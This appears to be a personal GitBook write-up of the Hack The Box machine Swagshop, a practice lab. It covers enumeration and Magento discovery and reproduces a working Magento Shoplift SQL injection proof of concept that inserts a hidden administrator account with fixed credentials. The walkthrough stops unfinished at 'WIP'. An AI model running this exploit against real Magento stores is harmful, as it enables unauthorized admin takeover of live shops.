Offensive Security
Offensive Security
Offensive Security
Offensive Security
About me / contact me
Penetration Testing with Kali
Note taking
Master your skills
OSCP
Information gathering
Gaining Access - Vulnerability Exploitation
Privilege Escalation
HTB
Active
10.10.10.140 - Swagshop
10.10.10.121
Retired
VulnHub
Brainpan - 1 - Buffer Overflow
Web Vulnerabilities - OWASP TOP 10
SQL Injection
XXE - XML External Entity
Command Injection
Cross Site Scripting
Broken Authentication and Session Management
Insecure Direct Object References
Cross Site Request Forgery
Security Misconfiguration
Insecure Cryptographic Storage
Insufficient Transport Layer Protection
Other Web Vulnerabilities
Remote File Upload
Remote File Inclusion
Local File Inclusion
Personal Projects
WiFi Penetration Testing
Phishing attempts
Case of executing python projects through SilentTrinity
News
Operating System philosophy
Powered by GitBook

10.10.10.140 - Swagshop

Run an Nmap scan on the 10.10.10.140 host, specifying -Sv for service detection:

We learn that the host is running Ubuntu server Xenial release by cross referencing the service version with Ubuntu launchpad repository:

Apache server 2.4.18 is also present indicating web application running on port 80. Dirbuster was used to map the directories structure:

CMS providing the "user experience" is based on Magneto from 2014:

One of the files responsible for configuration was exposed on port 80, revealing root password:

​

MagnetoConnect manager is present at http://10.10.10.140/downloader revealing version 1.9.0

Vulnerability research:

source: https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py​

import requests
import base64
import sys
​
target = sys.argv[1]
​
if not target.startswith("http"):
    target = "http://" + target
​
if target.endswith("/"):
    target = target[:-1]
​
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
​
# For demo purposes, I use the same attack as is being used in the wild
SQLQUERY="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""
​
# Put the nice readable queries into one line,
# and insert the username:password combinination
query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
​
# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds ypwq:123".format(target)
else:
print "DID NOT WORK"

Successful login to an administration panel:

New created credentials were valid for MagnetoConnect Manager as well:

​

WIP

HTB - Previous
Active
Next
10.10.10.121
Last updated 1 year ago